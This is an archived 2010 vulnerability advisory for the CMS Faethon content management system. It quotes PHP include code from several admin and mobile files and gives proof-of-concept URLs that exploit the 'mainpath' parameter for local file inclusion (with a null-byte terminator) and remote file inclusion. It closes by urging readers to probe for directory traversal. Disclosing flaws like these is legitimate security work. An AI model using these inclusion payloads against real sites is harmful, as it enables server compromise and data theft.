Multiple Vulnerabilities in CMS faethon

2010-03-29T00:00:00
ID SECURITYVULNS:DOC:23477
Type securityvulns
Reporter Securityvulns
Modified 2010-03-29T00:00:00

Description

    cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability

[+]Vendor: CMS Faethon [+]Version: 2.2.0-ultimate.7z [+]License: GNU GENERAL PUBLIC LICENSE [+]Download: http://sourceforge.net/projects/cmsfaethon/files/ [+]Risk: High [+]Remote: Yes [+]Local: Yes [+]Vulnerable: Since v1.12 CMS Faethon 1.3 (CMS Faethon 1.3-Ultimed to cmsfaethon-1.3.5-ultimate.7z) CMS Faethon 2.0 (cmsfaethon-2.0-ultimate.7 to CMS Faethon 2.0.5 Blog Edition ) CMS Faethon 2.2.0 Ultimate

[+]Author: eidelweiss [+]Contact: eidelweiss[at]cyberservices[dot]com [+]Date: March 26 2010 (published march 27) [+]Thank`s: sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) [+]Special: [D]eal [C]yber - syabilla_putri (i miss u to)

-=[Description]=-

CMS Faethon is content management system for different web pages.

    CMS Faethon 2.2

    This program is free software; you can redistribute it and/or
    modify it under the terms of the GNU General Public License
    as published by the Free Software Foundation; either version 2
    of the License, or (at your option) any later version.

-=[ VULN & =[P0C]= C0de ]=-

    $File: admin/index.php

***/

session_start(); $mainpath = "./"; include($mainpath .'../lib/functions_SQL.php'); include($mainpath .'../lib/functions_DATE.php'); include($mainpath .'../lib/class_multilang.php'); include($mainpath .'../lib/class_menu.php'); if($_GET['cmd'] != 'acp' || ($_GET['cmd'] == 'acp' && isset($_SESSION['auth_key']))) { include($mainpath .'header.php'); } else { include($mainpath .'config.php'); // possible Lfi here include($mainpath .'auth.php'); }

    $File: mobile/index.php

require('../config.php'); include('../lang/'.$cfg['lang'].'.inc'); $mainpath = "./"; $title = "Titulnн strana"; include($mainpath . 'header.php');

    $File: admin/articles/edit.php

if(!isset($_GET['cmd'])) { $mainpath = "../"; include($mainpath . '../lib/functions_SQL.php'); include($mainpath . 'header.php') ;

-=[P0C]=-

    http://127.0.0.1/[cms_faethon_path]/admin/index.php?mainpath=[LFI]%00

    http://127.0.0.1/[cms_faethon_path]/admin/articles/edit.php?mainpath=[RFI]

    http://127.0.0.1/[cms_faethon_path]/mobile/index.php?mainpath=[RFI]

    etc,etc,etc !!!

    so many vulnerability in this project 
    (I also saw possibility Directory Traversal vulnerability , use your skill and play your imaginasion)
#####################################################=[E0F]=